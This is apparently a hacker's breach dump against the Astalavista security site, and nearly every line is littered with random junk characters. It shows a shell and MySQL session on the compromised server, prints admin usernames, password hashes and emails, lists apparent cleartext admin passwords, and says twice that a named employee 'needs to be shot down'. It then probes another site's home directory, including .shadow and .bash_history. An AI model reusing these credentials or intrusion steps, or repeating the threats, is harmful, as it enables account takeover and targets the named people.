2 L# K) P7 a; ]3 b. w" O+ X) D <description>All availably Exploits.</description>
7 \ v) J/ N, K& f" }# h <language>en-us</language># [/ F8 B( X4 C6 b# G7 n) Q
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>4 ?, [" r7 X8 s8 P
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
4 ?9 T8 [" ?* {. y% }0 e <generator>Astalavista.com</generator>1 {6 x! @" f! w* S
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘6 D5 q6 @4 L1 G4 r9 K( \, j5 ?4 Q+ D# f
</channel>
8 N+ ?/ W. q" W, I0 O</rss>’;9 @3 _& K9 u1 l0 w. R# R) w+ X
! `5 y: Y4 B6 W
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {- J! ^ i/ n. g
unlink (FULLPATH . ‘/feed/exploits.xml’);
2 w3 |( w4 s% z" @3 H% [7 I) H }2 L7 p- K# [8 m* |) \3 F- w
: [0 u# Z. i8 ~3 G2 g
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);" b0 e' W! j* ?! ]8 P! e
[snip]4 v0 {7 M# {1 d5 c) U5 ~
+ ~8 f) D% W! V# _1 t
sh-3.2$ cat exploits.sh) p/ W) j- o7 I0 h& k
#!/bin/sh
$ y# Q3 e# g/ k& k0 ~" X0 ]! b, m6 h2 a+ ^2 r
###########################################################
7 l) J. g( ?) ]6 {% c2 v# #
7 k; p3 c1 S' {5 d; w% b# Title: milw0rm exploits adder #1 d6 \7 }& Q0 P
# Description: Add all milw0rm exploits to the #( s- P/ z1 j8 P) ~. C
# Astalavista.com database #( S+ k0 k1 b7 {3 e( E( x
# #
" f" E5 b% ^0 p0 t' ?2 b, ]# Company: Astalavista Group #' H. Q/ y2 {6 |/ [' D. W7 U
# Author: Paulo M. Santos #
4 }) \' `1 F+ `% k# E-Mail: 链接标记paulo.santos@astalavista.ch #
8 ^. {7 R, \* e8 l4 T% P# #! s6 b7 e* o+ A+ J$ y
###########################################################1 v3 M' k: L A7 P$ y* ? _* U% B
n3 n% `& v( b$ g8 p: L9 j5 i# path, U0 x1 \* ]$ n+ F
this_path=/home/com/public_html/modifications/cronjobs
1 n6 g) y9 ~- T7 [% L( G
$ J( X' ]9 K( A6 Q$ u, A# change directory \: S8 y5 g/ c6 p# f; m7 {
cd $this_path6 Z! N/ N m4 D& i9 d% d
cd tmp// x; N K' ?% A7 U: s: e1 Q
2 c+ u/ i: |5 D0 T2 H: ? e# delete files: Q: K* l( t- I9 ?
rm -rf milw0rm.tar.* &
7 m1 R8 R4 P4 h; Rrm -rf milw0rm/ &/ P4 Q7 U, q, p6 H7 x% k% `: h8 s; D
' A2 E M+ x8 |! K5 C. z
# wget milw0rm paket2 F9 E. p7 C( A) \
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]& X. X3 `9 r( H3 {/ |8 l E# w
9 S% i; d. ?& `( \; _# extract milw0rm paket( I) K% n3 q$ H6 I1 ]0 Y
tar -xvf milw0rm.tar.bz2
2 G- [: P1 U; d. v7 V o# m$ g
3 o* i6 T/ s, H* h- E1 A. W7 x% @# change owner
9 D. M! @3 ]) F% Lchown -R com .. P+ A* |( t' o3 ?/ z$ ^7 X
chgrp -R com .6 c6 _! r5 F' X% M
% e5 q3 k$ r: O: R, [5 y# execute php script: ~: ~6 Z6 s e, N
cd $this_path3 q2 ]; Q9 D* P1 h
php -q exploits.php
( V* ]- L1 F! G* S) |! g/ U+ |* c; ^1 C% G9 ?: ~
# delete files _5 T# Z i% C3 S
rm -rf tmp/milw0rm.tar.*
/ Y! ^$ T4 [( o+ ~$ N) v7 r+ arm -rf tmp/milw0rm/: J/ M* j( D, E9 O" B
# o3 e. `/ C4 `; Fsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
( P, W/ E% b+ F% hPaulo M. Santos needs to be shot down.& O6 ]6 H0 f: Y* [
. i, v3 u' w/ o8 C! }# k
mysql -u contrexxuser2 -p
. o( ?' g5 U7 h+ M/ r% dEnter password: ]$ ^) e% F( ]% O- Q5 C" Y
Welcome to the MySQL monitor. Commands end with ; or \g. `* M: }7 r3 K
Your MySQL connection id is 261694
$ M' o7 ]; z$ ]5 {Server version: 5.0.45-community-log MySQL Community Edition (GPL)
5 `' a X0 T) F: h' w2 l4 F8 g6 V" f% |6 F* ~( `
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 H& K! E1 h* v5 K$ ?; m, k% T/ Q; k( d$ O* ]6 j' Y$ ]: y$ U4 v0 E
mysql> show databases;% {; n' W3 ~9 G4 ~- k4 G
+——————–+' ~" P7 b7 Q& h
| Database |
( x! O# X* ~- ?0 l" J+ |( k+——————–+& B8 U S$ r' q, S; J
| information_schema |7 [$ x" c3 C) W% s
| com_contrexx2 |' N- f* P3 ?* u2 g2 O$ q) j: l
| com_contrexx2_live |, g# m5 Y3 _' R1 y' `" n% m! r
| test |( l% e: B0 l/ ]: B; S
+——————–+
* u3 {. T% J0 i5 }! N8 l4 rows in set (0.00 sec)+ O. _: V; \; R+ M* L
% C/ l' t A+ w G% O" K; amysql> use com_contrexx2_live5 \6 u2 h1 e" [' j; l. W' M
Database changed1 F" f: g2 `' ]9 z6 I, i' P' y9 F
mysql> show tables;/ ? y$ h R% o5 {! s# ~
+————————————————–+- U6 |8 G2 f3 ?) @2 d
| Tables_in_com_contrexx2_live |; y* j- z: T N2 M* U" M- m
+————————————————–+. _& e2 r- t7 A, s
| cc_banner_counter |
5 M0 F, Y7 n8 Z5 I# L! z| cc_search_counter |
+ a! n% b. h# {# c9 \ A| contrexx_access_group_dynamic_ids |
5 i6 B/ M7 U7 ?3 N| contrexx_access_group_static_ids |
7 j# \% c6 A% p8 X| contrexx_access_rel_user_group |7 h4 L4 Q4 k. H- I( u+ M
| contrexx_access_settings | ?! o( t$ B& X9 p
| contrexx_access_user_attribute |2 m% Y D( U5 b7 f, I
| contrexx_access_user_attribute_name |, Q/ N1 w$ F4 u& K3 G! F
| contrexx_access_user_attribute_value |
, X1 _) I5 a; q+ X% [5 G- Y| contrexx_access_user_core_attribute |
7 m G9 b% v5 U2 D: ]. j2 i( T| contrexx_access_user_groups |
3 }* x w& i9 O( ~4 w| contrexx_access_user_mail |
a) g! N) \7 d0 _ p3 s% w| contrexx_access_user_profile |
+ ]. k; [. o7 x: u| contrexx_access_user_title |
& T1 T# G/ `4 Y6 f2 j| contrexx_access_user_validity |
) S- J( j9 V4 h; C. f M| contrexx_access_users |
6 n. F8 F9 a* H* [5 G O1 r| contrexx_backend_areas |7 L* d+ b2 W V9 t& h; Z
| contrexx_backups |: t h" K9 N$ ?. s, \( n9 X
| contrexx_content |. T* e# d- y& L
| contrexx_content_history |
5 v$ `4 i; h2 O k k5 \9 || contrexx_content_logfile |
* d7 ?& W6 t9 f! M| contrexx_content_navigation |
8 ~* E5 F5 N1 _" }& U| contrexx_content_navigation_history |
4 N1 o* d0 M; `| contrexx_ids |
( q2 W' Q5 G4 ?( v" v: v| contrexx_languages | a9 `5 X9 z5 \+ L
| contrexx_lib_country |
" M) S2 n6 Q3 X6 {1 ]$ _ z6 v| contrexx_log |
7 d4 V8 m! \5 t- n/ T, W) e1 {- T| contrexx_module_alias_source |
2 t0 F9 r# V$ P' G0 q5 \& O5 y| contrexx_module_alias_target | ~' D( Y( Q( D, [+ ]1 ]2 d% f$ w' ~
| contrexx_module_block_blocks |
0 E* L$ c/ X) A, Y- G! L. J3 e' ]6 N| contrexx_module_block_rel_lang |! V n0 h1 J' U: A B5 ^
| contrexx_module_block_rel_pages |% Y) ?5 N3 S5 N4 u/ I& X
| contrexx_module_block_settings |: H2 k U" j5 B7 A& F' p, z& @
| contrexx_module_blog_categories |
4 x; |6 x+ {- e0 s5 n3 J% || contrexx_module_blog_comments |# f* e+ d! |. U6 \; s
| contrexx_module_blog_message_to_category |
& N; {* N4 L" G; n) ? L' ~ q| contrexx_module_blog_messages |& b; {8 p+ z2 w- d
| contrexx_module_blog_messages_lang |
! A- ^; U. F: l$ O& t% l# ~| contrexx_module_blog_networks | @% y4 \- e# ^) Y1 w
| contrexx_module_blog_networks_lang |
+ w* V. n6 ?8 w+ S; a| contrexx_module_blog_settings |% V8 L- B% G4 K" F% z5 ^ x# H) k$ ]
| contrexx_module_blog_votes |
4 i* \# O. x% ^3 N| contrexx_module_calendar |
, ?3 E3 O+ G [/ \* d6 N| contrexx_module_calendar_access |9 D$ N' L1 D4 A( ~
| contrexx_module_calendar_categories |
! ?8 f* s4 v% G7 ~- ?| contrexx_module_calendar_form_data |
$ ]+ x8 F9 U5 G, W| contrexx_module_calendar_form_fields |
8 Y* o: D+ R2 w# {$ C7 E: || contrexx_module_calendar_registrations |
- R) [. g9 k: L: R| contrexx_module_calendar_settings |8 m1 H) d, S, P9 O9 e
| contrexx_module_calendar_style |2 S) _" R; e( E% }2 c v
| contrexx_module_contact_form |: M; \" A' C: l* j
| contrexx_module_contact_form_data |/ R7 r5 Z9 D4 Q1 V
| contrexx_module_contact_form_field |
, X4 S. A3 j$ `5 r, G2 b| contrexx_module_contact_settings |
- p Q7 B1 a/ e6 h' G! ^8 h& X# T1 f| contrexx_module_data_categories |' n$ p1 s$ C. {& p7 z
| contrexx_module_data_message_to_category |
- G# W+ O$ ?$ e4 ^5 n7 [& Y| contrexx_module_data_messages |3 X! n1 A5 g' n) x. @" r
| contrexx_module_data_messages_lang |6 i& B) u4 P" O5 z
| contrexx_module_data_placeholders |
+ ^* c6 _. h9 |- `4 T' ^) z& w+ ^| contrexx_module_data_settings |
# G) `+ n! P7 {| contrexx_module_directory_access |
! m2 Y5 W/ C8 t \$ P% T| contrexx_module_directory_categories |; y6 q8 U. j$ P1 e- S
| contrexx_module_directory_dir |" n/ U4 [3 e4 ^
| contrexx_module_directory_inputfields |
& T5 B4 W+ x' R8 Y, ?| contrexx_module_directory_levels |
* ?+ B, F- X: ^0 M5 Q| contrexx_module_directory_mail |
8 H Y+ y; v D# K| contrexx_module_directory_rel_dir_cat |
- u# K5 X; @+ B$ _! F| contrexx_module_directory_rel_dir_level |6 p6 X/ r! i" j h* P1 }
| contrexx_module_directory_settings |2 D8 ?4 _- o. V+ n9 q
| contrexx_module_directory_settings_google |6 h: k8 _: w. j
| contrexx_module_directory_vote |: M6 k+ b2 o+ G. c; Z: J
| contrexx_module_docsys |
$ w/ Y( `3 @' Y) V| contrexx_module_docsys_categories |# r# N) b( ]6 {- F
| contrexx_module_egov_configuration |6 ?& n, b: w: N' e5 N
| contrexx_module_egov_orders |
4 [# q3 R+ N6 q' C; v3 A7 h. m; o| contrexx_module_egov_product_calendar |- Y. p5 h8 ^2 T' J c4 ~. @
| contrexx_module_egov_product_fields |% c- ^; i4 l. C7 @
| contrexx_module_egov_products |. g m& O3 E* l" N& c" x
| contrexx_module_egov_settings |
) M2 E$ Q! }) h+ {# q| contrexx_module_exploits |* \# N' D1 n$ W1 } r
| contrexx_module_exploits_categories |
+ K* j6 @- z+ O| contrexx_module_feed_category |
4 ]- J% ~) D' S1 O8 C/ h| contrexx_module_feed_news |4 ]& F2 t X! Z" v
| contrexx_module_feed_newsml_association |
, e0 b& Y4 H( K+ a$ v| contrexx_module_feed_newsml_categories |) s$ {3 A8 I- x' K
| contrexx_module_feed_newsml_documents |
- ^$ _0 t4 I9 S. q1 L| contrexx_module_feed_newsml_providers |
\, o# e" ~! F3 |* E8 Z| contrexx_module_forum_access |4 h8 R) E( Y, J
| contrexx_module_forum_categories |. a1 ] E' R, Q W4 x0 X
| contrexx_module_forum_categories_lang |* F1 n' ]( J6 d# _ b4 S$ l6 x# l+ J
| contrexx_module_forum_notification |
! e, X7 g8 V) f8 b, G, _3 W- f| contrexx_module_forum_postings |
3 m; d, T3 s" E3 K8 u6 {5 q| contrexx_module_forum_rating |& p% o% h* e8 G, ^0 d7 @. g1 z
| contrexx_module_forum_settings |
) n7 H) G- L8 B' z2 D0 e+ `| contrexx_module_forum_statistics |: m6 O8 ~0 C2 T( f5 w; @& N
| contrexx_module_gallery_categories |
5 X5 x% p8 i" E1 L* P2 R4 j; f4 v| contrexx_module_gallery_comments |" U2 T6 v/ T+ j% T, x+ ^
| contrexx_module_gallery_language |2 s" e# j O& e& t
| contrexx_module_gallery_language_pics |
$ v1 }9 g7 R3 q2 I' z: Y2 }| contrexx_module_gallery_pictures |0 j9 j8 d ~7 v. I" n+ J, T" B0 [) I
| contrexx_module_gallery_settings |0 Q9 o! H& ?9 }
| contrexx_module_gallery_votes |/ X6 Y) j, K6 f& ~' ]( L: c( y
| contrexx_module_guestbook |; `9 m, r" I J) J
| contrexx_module_guestbook_settings | |# B% D8 A, g f, _7 e7 i* R
| contrexx_module_livecam | a* w# |3 |- _" d. P
| contrexx_module_livecam_settings |! @8 f( ^' d, Y( K
| contrexx_module_market |
a4 R9 w5 z" ]$ F$ C( T0 c. o/ ?| contrexx_module_market_access |1 K" w) V4 w+ w2 M, Z
| contrexx_module_market_categories |
* e" D" b6 S* K7 n. r& @| contrexx_module_market_mail |, A2 N! a+ a. L
| contrexx_module_market_paypal |* k& k) f; P! w+ m1 ~3 h
| contrexx_module_market_settings |
- c6 u7 J# f M6 f% L G, g0 L& e| contrexx_module_market_spez_fields |
# | l2 P" I! P/ ^0 o" T0 [8 O| contrexx_module_mediadir_access |
" b& B& d* u$ h0 [3 H5 z9 z4 m| contrexx_module_mediadir_categories |
" t+ [6 Q H4 l) N$ m! k| contrexx_module_mediadir_comments |
1 c, |/ R u3 h s| contrexx_module_mediadir_dir |
4 j. @8 A4 J2 z% u L4 |' z| contrexx_module_mediadir_inputfields |) N b# n" o* E- N
| contrexx_module_mediadir_levels |& t, u, N+ y0 s0 V: y' b! m
| contrexx_module_mediadir_mail |
9 |; D7 C/ N# S8 M X; ]| contrexx_module_mediadir_rel_dir_cat |
3 o6 s. w y z- t$ w( c| contrexx_module_mediadir_rel_dir_level |
: p, \% o9 j/ L& B| contrexx_module_mediadir_reports |+ t2 |" \+ r1 H& k! I
| contrexx_module_mediadir_settings |) y1 F: U( m; q, j6 B& i: d4 a
| contrexx_module_mediadir_settings_google |
z) a0 F/ P" a! Y( {' \| contrexx_module_mediadir_vote |% _# o: f; `- c6 i
| contrexx_module_memberdir_directories |
5 p$ V0 g9 e H5 e$ B) T| contrexx_module_memberdir_name |. T6 Y6 v1 _7 D" \* l5 U
| contrexx_module_memberdir_settings |
+ M) v( b" U; A$ \! i| contrexx_module_memberdir_values |
- Y1 s1 [1 e! ]1 J; I$ Z| contrexx_module_nettools_allowed_groups |
& I3 y. i0 s& w1 _4 W| contrexx_module_nettools_settings |
6 G: J! f! l. g6 L- [| contrexx_module_news |! H- O' x- c4 t
| contrexx_module_news_access |& A' G9 J/ R% U. [
| contrexx_module_news_categories |
- y; q6 h |& l0 Y| contrexx_module_news_settings |# Q K7 b1 ^+ ^7 [* @2 S6 Q
| contrexx_module_news_teaser_frame |
# U' @( x& w; c+ h. g| contrexx_module_news_teaser_frame_templates |/ O* B* h1 B/ z; y0 c- r! H; _
| contrexx_module_news_ticker |
, f$ S `3 j6 @) e' _| contrexx_module_newsletter |
9 J5 F3 S0 g* z/ Z7 c3 o* y1 C| contrexx_module_newsletter_attachment |8 i* e) y) ?) v- z4 @" k$ ~& v/ w! r
| contrexx_module_newsletter_category |
* G* F! N9 E( ^# U' L5 H* d' {* H| contrexx_module_newsletter_confirm_mail |) D ~+ w: A8 A5 D- N- v
| contrexx_module_newsletter_rel_cat_news |
% F2 P! B7 r4 Y8 s$ K# N4 \, b| contrexx_module_newsletter_rel_user_cat |1 k1 _5 x! h& }. W$ d
| contrexx_module_newsletter_settings |" {" ^ k) B' \6 }# k2 t" Y
| contrexx_module_newsletter_template |
& m0 q) l3 Y/ g| contrexx_module_newsletter_tmp_sending |
: X1 p% k, s( W* f4 [| contrexx_module_newsletter_user |& H# L$ D8 S6 `8 ~1 m
| contrexx_module_newsletter_user_title |. x* H( _/ j8 |1 q0 m
| contrexx_module_onlinetools_defaultports |2 F4 N! @3 O* |
| contrexx_module_onlinetools_defaultports_back |, p+ ?2 a; A6 D$ I
| contrexx_module_onlinetools_geolitecity_blocks |$ a! d) m5 d6 q8 I1 q: S2 ?
| contrexx_module_onlinetools_geolitecity_country |. O$ U; w( Q" U7 v
| contrexx_module_onlinetools_geolitecity_location |- a0 F- E+ `# p+ Y( c4 ^
| contrexx_module_podcast_category |
: _& [% P7 q+ ]) } g| contrexx_module_podcast_medium |
* |. p: f5 H- D| contrexx_module_podcast_rel_category_lang | Q P/ H1 a. A8 ~, J
| contrexx_module_podcast_rel_medium_category |
9 F! W% l3 O: D; O| contrexx_module_podcast_settings | `! X9 Y0 i" N" I7 L
| contrexx_module_podcast_template |/ P y3 [) m" w4 C6 x. U/ ?
| contrexx_module_proxydb |
9 M4 e0 P- a7 p5 M& U a| contrexx_module_recommend |4 ~+ I Q- \. k& S% u
| contrexx_module_repository |
p4 X* }1 X' l( m/ r| contrexx_module_securitynews_cats |
' A* D9 J0 M; r8 c/ L| contrexx_module_securitynews_feeds |6 M- B* _* F- h- i- _( Y- q( J! r
| contrexx_module_securitynews_news |( C$ c5 X% {* Q K
| contrexx_module_shop_categories |* S; c- m2 J. C$ L7 L# G
| contrexx_module_shop_config |
) S/ B& h) c( A5 h$ p) q| contrexx_module_shop_countries |
: k" O1 I* G8 Y4 l% X: A) p5 h, l| contrexx_module_shop_currencies |
" l5 l! R) } Z @| contrexx_module_shop_customers |
: P, g- i. E9 O% \; M| contrexx_module_shop_importimg |8 i# Z/ W {' p5 f0 H2 B% }, ?
| contrexx_module_shop_lsv |$ m, _* H* Z/ z) W5 D& I
| contrexx_module_shop_mail |
& X/ e2 A, F9 Q) l+ n| contrexx_module_shop_mail_content |
" J0 A- n8 V6 v( L- g/ X| contrexx_module_shop_manufacturer |
% v; A! y( W; |+ c9 Q9 d: F0 J3 o| contrexx_module_shop_order_items |
& |+ m, Z/ k6 B9 ~| contrexx_module_shop_order_items_attributes |6 {4 A8 c2 k' A7 z( q
| contrexx_module_shop_orders |5 X ]+ s, |, r4 Q1 R$ a K7 u
| contrexx_module_shop_payment |! z% N5 J! j" A+ T
| contrexx_module_shop_payment_processors |
5 ?; m! U! X2 `7 @, _| contrexx_module_shop_pricelists |( I" H9 g2 X% Z W; ~! S# \. v7 C: K
| contrexx_module_shop_products |
% c9 M: K2 H# R5 g7 g+ c+ l& k| contrexx_module_shop_products_attributes |& @/ w9 h9 D7 O0 o, y; c( h
| contrexx_module_shop_products_attributes_name |
9 @- E' C1 E* y( v' w1 {| contrexx_module_shop_products_attributes_value |
& F& L7 T3 h0 ^5 m| contrexx_module_shop_products_downloads |
# `/ ^/ Z K% u H6 w+ c| contrexx_module_shop_rel_countries |# C- ^! s" s: B6 g9 s
| contrexx_module_shop_rel_payment | g" s4 E+ G3 ^+ Q; u# j
| contrexx_module_shop_rel_shipment |
% ~& x8 |% x; t3 a; N2 j3 A; m| contrexx_module_shop_shipment_cost |7 N3 V0 ?" |! k; t# O, D
| contrexx_module_shop_shipper |0 ^4 H) J5 z7 R& O X# m
| contrexx_module_shop_vat |4 q2 b, a; |, y! w# I% l( n3 r3 W6 t
| contrexx_module_shop_zones |7 \( {+ R5 |+ x+ i8 ]% T
| contrexx_module_u2u_address_list |
) E8 C+ ^7 \3 E, z5 g8 \0 a3 c; U2 Y| contrexx_module_u2u_message_log |
4 ^$ ~8 F7 Y5 l( A7 X% N| contrexx_module_u2u_sent_messages |
+ _) q& B; \, @; B| contrexx_module_u2u_settings |
$ ~0 M& x2 p- H$ l8 |: c+ s. K| contrexx_module_u2u_user_log |
4 M, W9 e" p0 T1 v+ x, p| contrexx_modules |
3 {1 k% S2 o2 @$ s| contrexx_sessions |" \9 {0 Y! T, T5 S- [( E- P
| contrexx_settings |
4 z: Y% {: S) J5 j/ D9 }( @| contrexx_settings_smtp |! S1 E9 g: m5 _/ n8 F
| contrexx_skins |& G% M9 _! l- n$ Y6 Y& R3 w! V
| contrexx_stats_browser |
2 _* x& c0 W0 o| contrexx_stats_colourdepth |
* \8 u- k; z7 n9 ~8 N/ V| contrexx_stats_config |0 L8 X4 w9 c0 q. ` L
| contrexx_stats_country |
: L/ D; I7 g/ D# d! g% |1 F/ i| contrexx_stats_hostname |1 X0 l# e+ d7 a8 f9 K% J
| contrexx_stats_javascript |: |( ?, }5 ?- H7 v* l; v
| contrexx_stats_operatingsystem |: O. `! d/ f2 z/ r/ T C) J5 A8 I
| contrexx_stats_referer |. Y a% E( I, ?' ^ j7 P
| contrexx_stats_requests |
- o: B0 O3 M q7 u! `8 R7 h _ _| contrexx_stats_requests_summary |9 d( r5 h. m; q Y3 G; G* U; ^& W
| contrexx_stats_screenresolution |
% g9 u1 Y) G6 o4 _| contrexx_stats_search |
- F# q" q8 d7 i6 s0 E$ f3 \| contrexx_stats_spiders |
' N: k+ T1 Q& l8 V4 q| contrexx_stats_spiders_summary |
" G- K; L/ o u8 q$ F9 m; M( V| contrexx_stats_visitors |4 \: k' E3 s$ ^4 E/ y& ~1 ]3 c4 Q
| contrexx_stats_visitors_summary |1 E) i4 o3 o- T+ l D( G
| contrexx_voting_additionaldata |
+ p8 r# o9 Q: U$ m" J* K, N/ t| contrexx_voting_email |0 E: P' M) I) ]+ @8 s+ o% p3 m
| contrexx_voting_rel_email_system |8 N! W2 u1 A+ _# ]! d" ]
| contrexx_voting_results |
V6 m& r' X& E; Z6 j( _4 E. M| contrexx_voting_system |
' @! _. T: F1 u1 v3 d5 b6 B) K| foo |+ D0 ]" N: I5 X( c2 }
+————————————————–+
. }0 J) Q" {; ]; [227 rows in set (0.01 sec)6 }) J0 K$ P6 L7 \; D1 g& W, y
! @, V5 \$ w" v/ ]; ^: f
mysql> select count(*) as skids from contrexx_access_users;; f' i+ ?' G% U# M3 f$ o
+——-+- e: C, x7 }0 O# p- a4 O
| skids |
. ^8 j! e) F t/ {' T9 T# o1 V+——-+
3 w6 S/ Q' p2 A) T| 53699 |
/ O6 F9 F4 y& H( L+——-+
, E' L# f' F$ D1 row in set (0.00 sec)( m C' N* Q( B/ x3 F; V4 ]
% ?9 M( G! H1 o/ i7 `! v/ Z
mysql> describe contrexx_access_users;! I& H+ J8 w$ r( o: v
+——————+——————————————+——+—–+————–+—————-+! {/ i) [, |% S# z! e% f
| Field | Type | Null | Key | Default | Extra |, X+ i3 P1 U" N, F; S. Q& H# h0 i0 k
+——————+——————————————+——+—–+————–+—————-+
: Q0 L0 U3 x5 R1 q/ a| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
% f; G5 G& V$ t; W4 u+ @8 || is_admin | tinyint(1) unsigned | NO | | 0 | |4 V- u1 C& X4 ?: O
| username | varchar(40) | YES | MUL | NULL | |' ?* g1 W* B: p- q! n! g4 ~7 ^6 f
| password | varchar(32) | YES | | NULL | |
* \+ Z4 J6 l9 V. ^: }" _( H1 ?| regdate | int(14) unsigned | NO | | 0 | |
4 z- U. S* N+ e| expiration | int(14) unsigned | NO | | 0 | |
3 O6 J9 z5 N1 @% R| validity | int(10) unsigned | NO | | 0 | |2 K9 ]9 m2 c+ e+ J; ?# s6 Q6 T
| last_auth | int(14) unsigned | NO | | 0 | |) a7 o3 V% {- |) t% A6 W
| last_activity | int(14) unsigned | NO | | 0 | |2 [& A: W( n _: @; I( @$ Q
| email | varchar(255) | YES | | NULL | |4 K s4 y. `9 ^; S- w) ^9 Z
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
( H9 D& A# d% e) A* o5 h| frontend_lang_id | int(2) unsigned | NO | | 0 | |
- a/ Y7 r2 s) S3 s% W. A| backend_lang_id | int(2) unsigned | NO | | 0 | |
( R% _5 }7 ^, r: a1 W" q$ s| active | tinyint(1) | NO | | 0 | |2 s3 ?* R. _6 q6 e
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |& O! H3 M1 H$ g7 o/ e
| restore_key | varchar(32) | NO | | | |
7 |% k7 F2 p/ o2 x2 i! M| restore_key_time | int(14) unsigned | NO | | 0 | |
9 U$ J, V6 D; o: E/ B# {1 ]| u2u_active | enum(’0′,’1′) | NO | | 1 | |1 A" k/ N+ B( ~* j
+——————+——————————————+——+—–+————–+—————-+2 [! M5 A4 S) p; i9 P
18 rows in set (0.00 sec)
) E9 p* S2 n5 Z0 H+ ~! S7 Q$ w% U
# y) F2 S1 |6 I$ w% e( Q. S. cmysql> select username,password,email from contrexx_access_users where is_admin = 1;
. W% F& `, K3 L+————+———————————-+—————————–+ K' C k* a0 x% J9 }0 w8 Q
| username | password | email |
" N' ?; E6 \' F# v& y+————+———————————-+—————————–+
6 O/ y3 E6 y- k. L2 h1 c| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
* a( D7 F4 h+ O; X* ?) r9 l0 V! F5 b| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |7 N* d5 k' V% v% @
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
7 S0 t4 {4 f) m% i: V| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |$ V/ S O3 K9 t* V6 }
+————+———————————-+—————————–+
; I5 _. S- N/ F! w( U4 rows in set (0.04 sec); w2 \* L0 T% i R$ t
# T: ^6 T/ u- Q& O$ L
mysql> exit;* T' c ]: T. ]) i1 B
Bye* C) O7 o9 c- y i% J! F. X! h
' k* h) P8 R4 F% N; F[~] There you go, your “team of security and IT professionals” is a joke.
; w7 A' K4 ?+ _4 Z& b) y+ G/ X9 ^( T! \
+——————————+
7 W. b/ k7 d9 }system:f82BN3+_*
. O# L% s/ b4 ^! FBe1er0ph0r:belerophor4astacom, |" u b4 C7 P% @! z
prozac:asta4cms!
! |9 W* a! s3 d( Fcommander:mpbdaagf6m
5 O8 i! B' R* v0 B1 Z' Psykadul:ak29eral
: W% k! E' O5 S% _4 b# }. l+——————————+
Z( A) Y" X* \. ^5 x4 }# u2 m! j2 c4 n& |, d
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s), _" F ]6 O" P/ `$ f D) L
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.* [$ D; `& G% q2 P& N
9 k: D$ `" G3 J/ C6 `- w% ?2 |
[~] Lets move to astalavista.net now,* ^9 a- }, B/ |5 _
, d6 n& x# s7 ?1 o5 y" ~1 qFrom <链接标记[url]https://www.astalavista.net/[/url]>:" c3 F6 V( z z/ n6 K( r, b
>> Everyone knows that the best defense is a good offense.1 z8 s; L6 ]; z# U
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.7 W, Q: i9 ]5 |4 k/ M
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.; U9 m% T5 a$ P
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
2 L( P+ M4 e, h0 n/ Z# @0 t* |
4 Y/ I) l" j7 a>> Go ahead, try and hack our server . in a completely legal way!
' ?* n& S4 a) Y8 x4 d>> Learn by doing: We offer our members tricky tasks and challenges on an
8 Q0 s2 U8 {: [- W* Z( J' `$ z>> ongoing basis so you can test your knowledge and abilities. You can also
* ^- j8 D9 A& m>> demonstrate what you.ve mastered by taking part in regular hacker contests# r1 s9 o: o D$ u- F. H% R0 w% i8 e
>> and war games
4 A- `# J( f" S" C- q q$ N3 E4 x/ x' G$ X' M+ g5 C
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!: {; C! f5 m/ M; X7 x/ w1 R7 H
0 e9 ]# H# D& j4 M7 h- @[-] Tricky task: Find home dir of astalavista.net0 @' p$ v# G2 I8 \( [7 N
, [# @ G* W7 ? T) b% k! Q
sh-3.2$ ls -la ~astanet
6 M% {# d3 Z9 d4 Ktotal 48
/ Z8 D# s" l' ^5 f; kdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .# [( }! y: ~9 [4 h/ t& B- b( y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 Q+ l5 y! u4 t0 f6 p g8 G5 k. T
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
, Q' {. z( H2 w+ E-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
- W" |: S& E( Z z5 T-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( `5 D1 w8 g; t-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile7 i2 b6 @& e% ^5 f4 c1 F& g
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc% x/ `3 ~0 g2 x+ s4 Q' ]
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains' C5 w" p, N/ ]4 t
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap# |) ?( F1 Y/ J( \7 F
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
( u) F) b" F% @. glrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
" n' o0 ~7 ?; \ Q1 A-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow) z2 t1 ~( g) t' e/ Y
- P2 P( r; Q% a8 o" B; J% g
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
6 M* z5 ^ E6 ^2 r- [9 ?8 Ssh-3.2$ ls -la1 |6 U! T ~0 k0 f. Z
total 200
~. A$ B) W5 @drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
2 b. Q. @- K- n+ W$ x$ ndrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..' a5 B8 A+ t3 z1 ~& q! G6 ^
